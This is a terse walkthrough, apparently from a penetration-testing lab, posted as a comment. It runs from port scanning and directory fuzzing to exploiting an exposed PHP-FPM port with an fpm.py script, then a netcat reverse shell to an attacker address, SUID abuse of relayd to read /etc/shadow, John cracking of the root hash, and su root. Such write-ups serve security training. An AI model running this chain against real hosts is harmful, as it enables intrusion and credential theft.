WDavid404
commented
1 month ago PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 61 OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp open http syn-ack ttl 61 Apache httpd 2.4.38 ((Debian))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-generator: Pico CMS
|_http-title: PlanetExpress - Coming Soon !
|_http-server-header: Apache/2.4.38 (Debian)
9000/tcp open cslistener? syn-ack ttl 61ffuf -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt -t 100 -u http://192.168.207.205/FUZZ
-->
content [Status: 301, Size: 320, Words: 20, Lines: 10, Duration: 187ms]
themes [Status: 301, Size: 319, Words: 20, Lines: 10, Duration: 111ms]
assets [Status: 301, Size: 319, Words: 20, Lines: 10, Duration: 91ms]
plugins [Status: 301, Size: 320, Words: 20, Lines: 10, Duration: 93ms]
vendor [Status: 301, Size: 319, Words: 20, Lines: 10, Duration: 94ms]
config [Status: 301, Size: 319, Words: 20, Lines: 10, Duration: 94ms]ffuf -u http://192.168.207.205/config/FUZZ -w /usr/share/seclists/Discovery/Web-Content/quickhits.txt -fw 20
-->config.yml
--> find "PicoTest" plugin info
http://192.168.207.205/plugins/PicoTest.php
-->
DOCUMENT_ROOT: /var/www/html/planetexpress
See 9000/tcp port method info on hacktricks and it provides an exploit py file
python fpm.py -c "<?php passthru('id'); ?>" -p 9000 192.168.207.205 /var/www/html/planetexpress/plugins/PicoTest.php | head -n 10
--> work!
python fpm.py -c "<?php passthru('nc 192.168.45.180 80 -e /bin/bash'); ?>" -p 9000 192.168.207.205 /var/www/html/planetexpress/plugins/PicoTest.php | head -n 10 --> get a reverse shell
find / -perm -u=s -type f 2>/dev/null
---> /usr/sbin/relayd is interesting.
/usr/sbin/relayd -h
-->
use /usr/sbin/relayd to read /etc/shadow file
crash shadow hash with John tool:john --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt
--》 neverwant2saygoodbye
su root --> succeed
Keypoint: